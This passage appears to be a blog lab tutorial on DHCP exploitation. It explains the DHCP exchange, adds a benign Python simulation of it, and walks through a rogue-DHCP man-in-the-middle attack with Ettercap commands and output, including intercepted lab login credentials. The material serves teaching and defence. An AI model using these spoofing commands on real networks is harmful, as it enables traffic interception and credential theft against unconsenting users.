<p>WhiteWinterWolf.com - networking</p>
<p>DHCP exploitation guide, published 2017-10-30 by WhiteWinterWolf: https://www.whitewinterwolf.com/posts/2017/10/30/dhcp-exploitation-guide/</p>
<p><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> allows devices to automatically get their network configuration when
bringing up a network interface (typically when booting).</p>
<p>This configuration usually includes, among other things, the <span class="caps">IP</span> address
assigned to the device, the <span class="caps">DNS</span> domain name and the <span class="caps">IP</span> addresses of the default
router, of the <span class="caps">DNS</span> server and of the NetBIOS name server.</p>
<p>This configuration is allocated to the device only for a given time: the
<em>lease time</em>.
The lease time varies widely depending on the environment’s requirements.
It is typical to find values ranging from a few dozen minutes to a few weeks.
When half of the lease time has expired, the device starts trying to contact
the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server to renew the lease.</p>
<p>Clients initially requesting an <span class="caps">IP</span> address start by
broadcasting a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">DISCOVER</span> message.</p>
<p>A typical <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> exchange is as follows:</p>
<p><span class="lb-small"><a href="#dhcp.png" id="dhcp.png-thumb" title="Click to enlarge"><img alt="Typical DHCP exchange" src="https://www.whitewinterwolf.com/posts/2017/10/30/dhcp-exploitation-guide/dhcp.png"/></a></span></p>
<ol>
<li>
<p><em><span class="caps">DISCOVER</span></em>: The client, which has no <span class="caps">IP</span> address configured yet, sends this query to
obtain one from the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server.
As the client has no information whatsoever about the current network
configuration, not even the address of the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, the request is broadcast on the local subnet.
The client <em>may</em> already ask for a previously leased <span class="caps">IP</span> address.</p>
</li>
<li>
<p>The server then searches for a free address it can allocate to the
client.
This usually involves two mechanisms:</p>
<ul>
<li>
<p>The server maintains a local database of leased and available <span class="caps">IP</span> addresses.</p>
</li>
<li>
<p>Once a candidate address has been selected, depending on its
implementation the server may take great care to check that the <span class="caps">IP</span>
address is indeed not already in use, by sending one or two <abbr title="Address Resolution Protocol"><span class="caps">ARP</span></abbr> requests and
waiting a relatively long time for any potential answer.</p>
</li>
</ul>
</li>
<li>
<p><em><span class="caps">OFFER</span></em>: The server proposes the address to the client.
For availability purposes <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> allows several servers to send concurrent
offers, the client choosing the “best” one.
This message is usually sent as unicast to the client <span class="caps">MAC</span> address.</p>
</li>
<li>
<p><em><span class="caps">REQUEST</span></em>: The client broadcasts the address it has chosen.
This allows all <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> servers involved in this exchange to be aware of the
client’s decision.</p>
<p>Clients wanting to renew an already acquired lease first attempt to jump directly
to this step of the exchange by sending a unicast <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">REQUEST</span>
message to the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server which issued the lease.</p>
</li>
<li>
<p><em><span class="caps">ACKNOWLEDGEMENT</span></em>: The server acknowledges the client’s decision and provides
it with the complementary network configuration settings (the various settings
mentioned earlier).</p>
</li>
</ol>
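<p>Added here as a worked example that is not part of the article: a small Python model of the exchange just described, with the client asking to keep its previously leased address, two servers answering concurrently and the client picking the offer that preserves that address. The message layout follows RFC 2131; the second server, its pool, the lease time and the transaction id are constructed assumptions.</p>

```python
"""Minimal DHCP (RFC 2131) message builder/parser plus a simulated
DISCOVER / OFFER / REQUEST / ACK exchange between one client and two
competing servers.  Constructed example: addresses mimic the lab's
192.168.1.0/24 subnet, with R1 (192.168.1.1) as the first server."""
import socket
import struct

MAGIC = b"\x63\x82\x53\x63"                  # DHCP magic cookie after the BOOTP header
BOOTREQUEST, BOOTREPLY = 1, 2
DISCOVER, OFFER, REQUEST, ACK = 1, 2, 3, 5   # option 53 message types
OPT_MASK, OPT_ROUTER, OPT_DNS, OPT_REQ_IP, OPT_LEASE = 1, 3, 6, 50, 51
OPT_TYPE, OPT_SERVER_ID, OPT_END = 53, 54, 255
HDR = "!BBBBIHH4s4s4s4s16s64s128s"           # the fixed 236-byte BOOTP header

def ip(s):
    return socket.inet_aton(s)

def build(op, xid, chaddr, options, yiaddr="0.0.0.0"):
    """Serialize one DHCP message; options is a list of (code, bytes)."""
    hw = bytes.fromhex(chaddr.replace(":", "")).ljust(16, b"\0")
    fixed = struct.pack(HDR, op, 1, 6, 0, xid, 0, 0, ip("0.0.0.0"), ip(yiaddr),
                        ip("0.0.0.0"), ip("0.0.0.0"), hw, b"\0" * 64, b"\0" * 128)
    opts = b"".join(bytes([code, len(val)]) + val for code, val in options)
    return fixed + MAGIC + opts + bytes([OPT_END])

def parse(pkt):
    """Decode the fixed header and the TLV option list into a dict."""
    f = struct.unpack(HDR, pkt[:236])
    if pkt[236:240] != MAGIC:
        raise ValueError("not a DHCP message")
    opts, i = {}, 240
    while i < len(pkt) and pkt[i] != OPT_END:
        if pkt[i] == 0:                       # pad option: one byte, no length field
            i += 1
            continue
        code, ln = pkt[i], pkt[i + 1]
        opts[code] = pkt[i + 2:i + 2 + ln]
        i += 2 + ln
    return {"xid": f[4], "yiaddr": socket.inet_ntoa(f[8]),
            "chaddr": ":".join(f"{b:02x}" for b in f[11][:f[2]]),
            "type": opts.get(OPT_TYPE, b"\0")[0], "options": opts}

class Server:
    """A DHCP server: free-address list, pending offers and a binding table."""
    def __init__(self, sid, pool, router, dns, lease=3600):
        self.sid, self.free, self.router, self.dns, self.lease = sid, list(pool), router, dns, lease
        self.pending, self.bindings = {}, {}  # chaddr -> offered / leased address

    def on_discover(self, msg):
        wanted = msg["options"].get(OPT_REQ_IP)
        wanted = socket.inet_ntoa(wanted) if wanted else None
        # Honour a previously leased address if it is still free, else take the next free one.
        cand = wanted if wanted in self.free else (self.free[0] if self.free else None)
        if cand is None:
            return None                       # pool exhausted: no offer at all
        self.free.remove(cand)                # reserve it while the offer is pending
        self.pending[msg["chaddr"]] = cand
        return build(BOOTREPLY, msg["xid"], msg["chaddr"],
                     [(OPT_TYPE, bytes([OFFER])), (OPT_SERVER_ID, ip(self.sid))], yiaddr=cand)

    def on_request(self, msg):
        cand = self.pending.pop(msg["chaddr"], None)
        if socket.inet_ntoa(msg["options"][OPT_SERVER_ID]) != self.sid:
            if cand:                          # the client picked another server's offer
                self.free.append(cand)
            return None
        self.bindings[msg["chaddr"]] = cand
        opts = [(OPT_TYPE, bytes([ACK])), (OPT_SERVER_ID, ip(self.sid)),
                (OPT_MASK, ip("255.255.255.0")), (OPT_ROUTER, ip(self.router)),
                (OPT_DNS, ip(self.dns)), (OPT_LEASE, struct.pack("!I", self.lease))]
        return build(BOOTREPLY, msg["xid"], msg["chaddr"], opts, yiaddr=cand)

def choose_offer(offers, wanted):
    """Client policy: keep the previously leased address if any server offers it."""
    return next((o for o in offers if o["yiaddr"] == wanted), offers[0])

def run_exchange(servers, chaddr, wanted, xid=0x3903F326):
    """Broadcast DISCOVER, pick one OFFER, broadcast REQUEST, apply the winning ACK."""
    disc = build(BOOTREQUEST, xid, chaddr, [(OPT_TYPE, bytes([DISCOVER])), (OPT_REQ_IP, ip(wanted))])
    offers = [parse(off) for s in servers if (off := s.on_discover(parse(disc)))]
    best = choose_offer(offers, wanted)
    req = build(BOOTREQUEST, xid, chaddr, [(OPT_TYPE, bytes([REQUEST])), (OPT_REQ_IP, ip(best["yiaddr"])),
                                           (OPT_SERVER_ID, best["options"][OPT_SERVER_ID])])
    ack = [parse(rep) for s in servers if (rep := s.on_request(parse(req)))][0]
    o = ack["options"]
    return {"ip": ack["yiaddr"], "server": socket.inet_ntoa(o[OPT_SERVER_ID]),
            "router": socket.inet_ntoa(o[OPT_ROUTER]), "dns": socket.inet_ntoa(o[OPT_DNS]),
            "lease": struct.unpack("!I", o[OPT_LEASE])[0]}

def lab_exchange():
    """User_1 (MAC from the lab) asks to keep 192.168.1.101; R1 and a second server answer."""
    r1 = Server("192.168.1.1", ["192.168.1.101", "192.168.1.102"], "192.168.1.1", "192.168.1.1")
    r2 = Server("192.168.1.2", ["192.168.1.200"], "192.168.1.2", "192.168.1.2")
    return run_exchange([r1, r2], "00:01:93:b7:01:00", "192.168.1.101"), r1, r2
```

<p>The second server’s offer of 192.168.1.200 loses because the client prefers the offer that keeps its old address, and the broadcast REQUEST lets that server release its reserved candidate.</p>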
<p>There are several ways the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> protocol can be abused:</p>
<ul>
<li>
<p><em><abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> attack</em>:
An attacker can spoof the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server and send forged replies to the client
with fake network settings, allowing the attacker to intercept
the client’s subsequent communications.</p>
</li>
<li>
<p><em><abbr title="Denial Of Service"><span class="caps">DOS</span></abbr> attack</em>:
An attacker can simulate enough devices to exhaust the server’s pool of free <span class="caps">IP</span>
address leases, thus preventing upcoming legitimate devices from
obtaining an address and, thus, from accessing the network.</p>
</li>
</ul>
<p>These are the attacks we will see in this article, along with the ways to protect against them.</p>
<p><span class="lb-small"><a href="#topology.png" id="topology.png-thumb" title="Click to enlarge"><img alt="DHCP exploitation lab topology" src="https://www.whitewinterwolf.com/posts/2017/10/30/dhcp-exploitation-guide/topology.png"/></a></span></p>
<p>This article relies on the same topology as the rest of the series.
If you didn’t read the <a href="/posts/2017/10/10/practical-network-layer-2-exploitation-introduction/" title="Practical network layer 2 exploitation: introduction">introduction post</a>, do it now.</p>
<p>For this lab we will use the <em>Users</em> and <em>Servers</em> <span class="caps">VLAN</span>.
The <em>Admins</em> <span class="caps">VLAN</span> will not be involved.</p>
<p>As for the tools, for the <abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> part we will use <a href="https://ettercap.github.io/ettercap/" rel="external" title="Ettercap project homepage">Ettercap</a> and <a href="https://www.wireshark.org/" rel="external" title="Wireshark project homepage">Wireshark</a>,
and for the <abbr title="Denial Of Service"><span class="caps">DOS</span></abbr> part we will use <a href="http://www.yersinia.net/" rel="external" title="Yersinia project homepage">Yersinia</a> and <a href="https://github.com/kamorin/DHCPig" rel="external" title="DHCPig GitHub page">DHCPig</a>.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>While this series is about layer 2 exploitation, I still cover <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>, which
is traditionally described as a layer 7 protocol as it involves <span class="caps">UDP</span>
communications between a client and a server and does not directly provide a
service to upper layers, as a routing protocol would do for instance.</p>
<p>Personally I don’t find this categorization to be so obvious and definitive.
<abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> is above all a cross-layer protocol: <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> servers need raw access to
the network layer 2, they are not constrained by the local layer-3 firewall, and
<abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> messages are not routable but are instead limited to a single layer 2
broadcast domain (unless you use a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> relay).</p>
<p>Moreover, from a <em>functional</em> point of view, and this is again my own
opinion, <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> builds a bridge between layer 2 and layer 3, allowing a
device to obtain its own <span class="caps">IP</span> address (sometimes depending on its <span class="caps">MAC</span>
address), in a similar fashion to how <abbr title="Address Resolution Protocol"><span class="caps">ARP</span></abbr> and <abbr title="Reverse Address Resolution Protocol"><span class="caps">RARP</span></abbr> allow a device to resolve other
devices’ layer 2 and 3 addresses.</p>
<p>Finally, I thought it made sense in this series, here between the
purely <span class="caps">MAC</span>-related issues from the previous post and the <abbr title="Address Resolution Protocol"><span class="caps">ARP</span></abbr>-related issues
we will see in the next one, as it builds a logical evolution in both the
attacker’s abilities and the securing techniques.</p>
</div>
<h3 id="initial-state"><a class="toclink" href="#initial-state">Initial state</a></h3>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>In our lab the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server is hosted on the main router, <em>R1</em>:</p>
<div class="codehilite"><pre><span class="gp">R1#</span><span class="k">show</span> ip dhcp pool VLAN1
<span class="go">Pool VLAN1 :</span>
<span class="go">Utilization mark (high/low) : 100 / 0</span>
<span class="go">Subnet size (first/next) : 0 / 0</span>
<span class="go">Total addresses : 254</span>
<span class="hll"><span class="go">Leased addresses : 2</span>
</span><span class="go">Pending event : none</span>
<span class="go">1 subnet is currently in the pool :</span>
<span class="go">Current index IP address range Leased addresses</span>
<span class="go">192.168.1.102 192.168.1.1 - 192.168.1.254 2</span>
<span class="gp">R1#</span><span class="k">show</span> ip dhcp binding
<span class="go">Bindings from all pools not associated with VRF:</span>
<span class="go">IP address Client-ID/ Lease expiration Type</span>
<span class="go"> Hardware address/</span>
<span class="go"> User name</span>
<span class="hll"><span class="go">192.168.1.100 0001.93e9.0e00 Mar 02 2002 12:00 AM Automatic</span>
</span><span class="hll"><span class="go">192.168.1.101 0100.0193.b701.00 Mar 02 2002 12:42 AM Automatic</span>
</span><span class="gp">R1#</span><span class="k">show</span> clock
<span class="go">*00:58:32.527 UTC Fri Mar 1 2002</span>
<span class="gp">R1#</span>
</pre></div>
<p>We can see that both the <em>Attacker</em> and the <em>User_1</em> machines got their network
configuration from this <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server.
Don’t pay attention to the lease expiration: I did not set the time.</p>
<p>We can check the network configuration on both of these hosts, here <em>User_1</em>:</p>
<ul>
<li>
<p>Default router and output interface:</p>
<div class="codehilite"><pre><span class="gp">gns3@box:~$</span> route -n
<span class="go">Kernel IP routing table</span>
<span class="go">Destination Gateway Genmask Flags Metric Ref Use Iface</span>
<span class="hll"><span class="go">0.0.0.0 192.168.1.1 0.0.0.0 UG 0 0 0 eth0</span>
</span><span class="go">127.0.0.1 0.0.0.0 255.255.255.255 UH 0 0 0 lo</span>
<span class="go">192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0</span>
<span class="gp">gns3@box:~$</span>
</pre></div>
</li>
<li>
<p><span class="caps">IP</span> address assigned to the default output interface:</p>
<div class="codehilite"><pre><span class="gp">gns3@box:~$</span> ifconfig eth0
<span class="go">eth0 Link encap:Ethernet HWaddr 00:01:93:B7:01:00</span>
<span class="hll"><span class="go"> inet addr:192.168.1.101 Bcast:192.168.1.255 Mask:255.255.255.0</span>
</span><span class="go"> inet6 addr: fe80::201:93ff:feb7:100/64 Scope:Link</span>
<span class="go"> UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1</span>
<span class="go"> RX packets:157 errors:0 dropped:0 overruns:0 frame:0</span>
<span class="go"> TX packets:160 errors:0 dropped:0 overruns:0 frame:0</span>
<span class="go"> collision:0 txqueuelen:1000</span>
<span class="go"> RXbytes:12228 (11.9 KiB) TX bytes:14204 (13.8 KiB)</span>
<span class="gp">gns3@box:~$</span>
</pre></div>
</li>
<li>
<p>No <span class="caps">DNS</span> server configured:</p>
<div class="codehilite"><pre><span class="gp">gns3@box:~$</span> cat /etc/resolv.conf
<span class="gp">gns3@box:~$</span>
</pre></div>
</li>
</ul>
<h3 id="attacks"><a class="toclink" href="#attacks">Attacks</a></h3>
<h4 id="dhcp-server-spoofing-mitm-attack"><a class="toclink" href="#dhcp-server-spoofing-mitm-attack"><abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server spoofing (<abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> attack)</a></h4>
<h5 id="first-a-bit-of-theory"><a class="toclink" href="#first-a-bit-of-theory">First a bit of theory</a></h5>
<p>Unless the attacker somehow managed to cut the communication between the client
and the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, the attacker’s rogue <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server races against the
legitimate <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server: its answers must reach the client first, otherwise
they will most likely be ignored.</p>
<p>An attacker may attempt to forge either the <span class="caps">OFFER</span> or the <span class="caps">ACK</span> replies, each
having its own set of advantages and limitations<sup id="fnref-ideal-world"><a class="footnote-ref" href="#fn-ideal-world">1</a></sup>:</p>
<ul>
<li>
<p>Forging the <span class="caps">OFFER</span> usually gives an almost certain chance of winning the race.
Indeed, while the legitimate server takes time to ensure that no device
on the network is already using the <span class="caps">IP</span> candidate, the attacker doesn’t care
about such subtleties and directly sends his forged <span class="caps">OFFER</span> answer to the client.
Moreover, a desperate attacker may resort to first DOSing the legitimate
<abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server to get rid of it.</p>
<p>However, this has two main limitations:</p>
<ul>
<li>
<p>The attacker must use its own <span class="caps">IP</span> address pool, which may potentially
conflict with the legitimate server’s pool and generate some panic on the network.</p>
<div class="admonition warning">
<p class="admonition-title">Warning</p>
<p>Duplicate <span class="caps">IP</span> addresses can cause real trouble.</p>
<p>Don’t try this in real environments unless you know what you are
doing or expect to <abbr title="Denial Of Service"><span class="caps">DOS</span></abbr> the network anyway.</p>
</div>
</li>
<li>
<p>If the client specifically asked for a previously leased <span class="caps">IP</span> address
in its <span class="caps">DISCOVER</span> message, then the answer from the legitimate server
might still be considered the “best” one even though it was received
later, as long as it allows the client to keep its requested <span class="caps">IP</span> address.</p>
</li>
</ul>
</li>
<li>
<p>Winning the race when forging the <span class="caps">ACKNOWLEDGEMENT</span> is more random and depends
on various factors, in particular the position of the involved parties in
the topology.
The attack has the best chances of succeeding when the attacker is closer to
the target than the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server is, which is not unusual.</p>
<p>Moreover, the interception won’t survive a lease renewal: when the client
reaches half of its lease time, it will send a <em>unicast</em> <span class="caps">REQUEST</span> to
the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server which issued the <span class="caps">IP</span> address.
In this case, the client will contact the legitimate server, which will
in turn provide it with the legitimate network settings in its acknowledgement.</p>
<p>As long as the environment allows it, I think this is the most elegant and
reliable choice as the client ends up with a valid <span class="caps">IP</span> address legitimately
leased by the real <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server.
In fact, from the point of view of the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, everything went
normally, the only difference being in the network settings finally applied
by the client.</p>
</li>
</ul>
<p>As seen above, a <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server provides among other settings the <span class="caps">IP</span> addresses of
the default router and of the <span class="caps">DNS</span> server.
The attacker may fake either of these:</p>
<ul>
<li>
<p>By faking the default router address, all the victim’s communication will
go through a machine controlled by the attacker.</p>
</li>
<li>
<p>By faking the <span class="caps">DNS</span> server address, the attacker puts himself between
the client and the legitimate <span class="caps">DNS</span> server, controlling the content of the <span class="caps">DNS</span>
answers reaching the client.
This allows the attacker to select more finely which part of the
communication to redirect to an attacker-controlled machine (fake <span class="caps">DNS</span>
answers) and which part to leave as-is (real <span class="caps">DNS</span> answers).
This may also be useful to bypass security measures relying on <span class="caps">DNS</span> answers.</p>
</li>
</ul>
<p>Each has its own advantages, but both share the disadvantage that the target
will lose its network connectivity as soon as the attack
ends<sup id="fnref-configurable-leases"><a class="footnote-ref" href="#fn-configurable-leases">2</a></sup>.</p>
<p>In this lab we will spoof the router <span class="caps">IP</span> address provided in the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">ACK</span>
message, and mention how to apply this technique to <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">OFFER</span> as well.</p>
<h5 id="and-now-practice"><a class="toclink" href="#and-now-practice">And now, practice!</a></h5>
<table class="floatright">
<thead>
<tr><th>Lab</th><th>Compatible</th></tr>
</thead>
<tbody>
<tr><td>Dynamips</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td><span class="caps">IOU</span></td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
<tr><td>Real gear</td><td class="yes" title="Yes"><span class="sr-only">Yes</span></td></tr>
</tbody>
</table>
<p>For the attack itself, we will use <a href="https://ettercap.github.io/ettercap/" rel="external" title="Ettercap project homepage">Ettercap</a>.
I recommend however to also run <a href="https://www.wireshark.org/" rel="external" title="Wireshark project homepage">Wireshark</a> to get a better understanding of
what is going on on the wire.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>When running Wireshark from within the attacker’s host, you will only have
a partial view of the story.
In fact, you will not see the unicast responses sent by the legitimate <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr>
server to the client.</p>
<p>As far as the lab is concerned, if you want a more complete view
you can either run Wireshark directly on <em>User_1</em> and run <code>dhclient</code>
instead of rebooting to refresh your <span class="caps">IP</span> or, if you are using <span class="caps">GNS3</span>, you
can simply launch Wireshark directly on the link between <em>User_1</em> and its
nearest switch <em><span class="caps">ESW2</span></em> by right-clicking on the link and then selecting the
<em>Start capture</em> option (I love this feature!).</p>
<p>This will allow you to observe the reply of both the legitimate and the
rogue <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> servers as they reach the client.</p>
</div>
<p>We will use Ettercap with the following parameters:</p>
<ul>
<li><code>-T</code>: For the text mode, as opposed to the <span class="caps">GUI</span>, curses or daemon mode.</li>
<li><code>-z</code>: Skip the initial scanning of running hosts in the local subnet.</li>
<li><code>-q</code>: Don’t print packets details (we already have Wireshark for that, we
don’t want to clutter Ettercap output with this kind of information).</li>
<li><code>-M</code>: Select the <abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> attack to use, here it is <code>dhcp</code> with the following
slash-separated arguments:<ul>
<li>Empty <span class="caps">IP</span> range: Ettercap will only fake <span class="caps">ACK</span> messages.
Set this to a (hopefully unused) <span class="caps">IP</span> range to allow Ettercap to
generate <span class="caps">OFFER</span> messages, for instance <code>192.168.1.50-192.168.1.99</code>.</li>
<li><code>255.255.255.0</code>: The network mask.</li>
<li><code>192.168.1.1</code>: The <span class="caps">DNS</span> server address (this value is nonsense, but this
argument is required).</li>
</ul>
</li>
</ul>
<p>This gives us the following result:</p>
<div class="codehilite"><pre><span class="hll"><span class="gp">root@kali:~#</span> ettercap -Tzq -M dhcp:/255.255.255.0/192.168.1.1
</span>
<span class="go">ettercap 0.8.2 copyright 2001-2015 Ettercap Development Team</span>
<span class="go">Listening on:</span>
<span class="go">eth0 -> 00:01:93:E9:0E:00</span>
<span class="go"> 192.168.1.100/255.255.255.0</span>
<span class="go"> fe80::201:93ff:fee9:e00/64</span>
<span class="go">SSL dissection needs a valid 'redir_command_on' script in the etter.conf file</span>
<span class="go">Ettercap might not work correctly. /proc/sys/net/ipv6/conf/eth0/use_tempaddr is not set to 0.</span>
<span class="go">Privileges dropped to EUID 65534 EGID 65534...</span>
<span class="go">33 plugins</span>
<span class="go">42 protocol dissectors</span>
<span class="go">57 ports monitored</span>
<span class="go">20388 mac vendor fingerprint</span>
<span class="go">1766 tcp OS fingerprint</span>
<span class="go">2182 known services</span>
<span class="go">Lua: no scripts were specified, not starting up!</span>
<span class="go">DHCP spoofing: using specified ip_pool, netmask 255.255.255.0, dns 192.168.1.1</span>
<span class="go">Starting Unified sniffing...</span>
<span class="go">Text only Interface activated...</span>
<span class="go">Hit 'h' for inline help</span>
</pre></div>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Ettercap also provides a <span class="caps">GUI</span>; you can get it by running <code>ettercap -G</code> or
through the <em>Applications</em> menu of your desktop manager.</p>
<p>Once started, go in <em>Sniff</em> > <em>Unified sniffing</em> and select the network
interface to use.
Then all the expected options will become available.</p>
<p>The <span class="caps">GUI</span> provides several tabs to manage the detected hosts, the
<abbr title="Man-In-The-Middle"><span class="caps">MITM</span></abbr> targets, the intercepted connections, etc.
Depending on your usage and habits, you may find it more convenient than
the command line.</p>
</div>
<p>Leave Ettercap and Wireshark running, and now reboot the <em>User_1</em> host.</p>
<p>Things should be moving on Ettercap’s side:</p>
<div class="codehilite"><pre>DHCP: [00:01:93:B7:01:00] DISCOVER
DHCP: [00:01:93:B7:01:00] REQUEST 192.168.1.101
DHCP spoofing: fake ACK [00:01:93:B7:01:00] assigned to 192.168.1.101
</pre></div>
<ol>
<li>First Ettercap detected a broadcast <span class="caps">DISCOVER</span> message, but since we did
not provide an <span class="caps">IP</span> range it did not react to it.</li>
<li>Then Ettercap detected a broadcast <span class="caps">REQUEST</span> message bearing the <span class="caps">IP</span> address
allocated by the legitimate <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, and reacted by sending a fake <span class="caps">ACK</span>
to the client with our customized router address.</li>
</ol>
<p>If you have a Wireshark running between <em>User_1</em> and its nearest switch, you
can see the two competing <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> <span class="caps">ACK</span> packets:</p>
<p><span class="lb-small"><a href="#two-ack.png" id="two-ack.png-thumb" title="Click to enlarge"><img alt="Two competing DHCP ACK packets" src="https://www.whitewinterwolf.com/posts/2017/10/30/dhcp-exploitation-guide/two-ack.png"/></a></span></p>
<p>The forged <span class="caps">ACK</span> containing the attacker’s <span class="caps">IP</span> as default router address managed
to slip through a few hundredths of a second before the legitimate <span class="caps">ACK</span>, and was
therefore the one taken into account by the client:</p>
<div class="codehilite"><pre><span class="gp">gns3@box:~$</span> route -n
<span class="go">Kernel IP routing table</span>
<span class="go">Destination Gateway Genmask Flags Metric Ref Use Iface</span>
<span class="hll"><span class="go">0.0.0.0 192.168.1.100 0.0.0.0 UG 0 0 0 eth0</span>
</span><span class="go">127.0.0.1 0.0.0.0 255.255.255.255 UH 0 0 0 lo</span>
<span class="go">192.168.1.0 0.0.0.0 255.255.255.0 U 0 0 0 eth0</span>
<span class="gp">gns3@box:~$</span>
</pre></div>
<p>The <em>User_1</em> host now uses the attacker’s machine as default router.</p>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>Depending on your luck you may need to try a second, or even a third time
before succeeding (as explained in the <a href="/posts/2017/10/25/mac-address-table-overflow/#session-stealing" title="MAC address table overflow: session stealing attack">previous post</a>, in
real life there will be several computers booting together at the beginning
of the work day, as many chances for a successful interception).</p>
<p>If for some reason Ettercap seems to systematically lose the race against
the <abbr title="Dynamic Host Configuration Protocol"><span class="caps">DHCP</span></abbr> server, quit the current Ettercap session by pressing <code>q</code> and
try to forge <span class="caps">OFFER</span> replies instead:</p>
<div class="codehilite"><pre>ettercap -Tzq -M dhcp:192.168.1.50-192.168.1.99/255.255.255.0/192.168.1.1
</pre></div>
</div>
<p>Now, still from the <em>User_1</em> host, connect and open a session on <em>Server_1</em>
administration interface.</p>
<p>Here again things should move in Ettercap:</p>
<div class="codehilite"><pre>HTTP : 192.168.3.100:80 -> USER: user PASS: bitnami INFO: http://192.168.3.100/wp-login.php?redirect_to=http://192.168.3.100/wp-admin/&reauth=1
CONTENT: log=user&pwd=bitnami&wp-submit=Log+In&redirect_to=http%3A%2F%2F192.168.3.100%2Fwp-admin%2F&testcookie=1
</pre></div>
<p>User’s credentials have been successfully intercepted by Ettercap!</p>
<p>If you check the data captured at the same time by the Wireshark running on the
attacker’s host, you may notice several things (in addition to the fact
that Wireshark too captured the user’s credentials):</p>
<p><span class="lb-small"><a href="#wireshark-attacker.png" id="wireshark-attacker.png-thumb" title="Click to enlarge"><img alt="Wireshark capture on attacker's host" src="https://www.whitewinterwolf.com/posts/2017/10/30/dhcp-exploitation-guide/wireshark-attacker.png"/></a></span></p>
<ul>
<li>
<p>First, Wireshark notices a lot of duplicated, retransmitted and
out-of-order packets (the black lines in the screenshot).</p>
<p>This is normal and expected: Ettercap indeed replays all packets received
from the victim to send them to their real target, changing only data-link
layer information.
This confuses Wireshark which interprets this as a network issue.</p>
</li>
<li>
<p>Then, in a similar fashion as in <a href="/posts/2017/10/25/mac-address-table-overflow/#eavesdropping" title="MAC address table overflow: eavesdropping">the previous post</a>, we have
access to only one side of the communication: the client-side this time.</p>
<p>This however is just a limitation of the tool we are using.
Ettercap only rewrites the data link layer information (the <span class="caps">MAC</span> addresses)
before forwarding the messages, meaning that they keep their original
source <span class="caps">IP</span> address.
The replies are therefore sent directly to the client without going through
the attacker’s host.</p>
<p>From a technical point of view, Ettercap could very well implement a
<span class="caps">NAT</span>-like functionality which would allow the replies to be routed to the
attacker’s machine too<sup id="fnref-NAT"><a class="footnote-ref" href="#fn-NAT">3</a></sup>.
This would provide a full-duplex interception of the target’s communication.</p>
</li>
</ul>
<div class="admonition note">
<p class="admonition-title">Note</p>
<p>There are two main impacts of a half-duplex interception:</p>
<ul>
<li>
<p>Obviously, as with the half-duplex sniffing we had in the previous lab,
you can only read one side of the communication.</p>
</li>
<li>
<p>But as this is an interception, you also gain write abilities, although
this ability is restricted as you cannot alter the packets’ length.
Indeed, having access to only one side of the communication means you
cannot adjust the <span class="caps">TCP</span> window acknowledgement coming from the server.
Any change in packet size would break the communication (but the
packet content can be freely changed).</p>
</li>
</ul>
<p>In a full-duplex interception, both the content and size of the packets can
be changed.
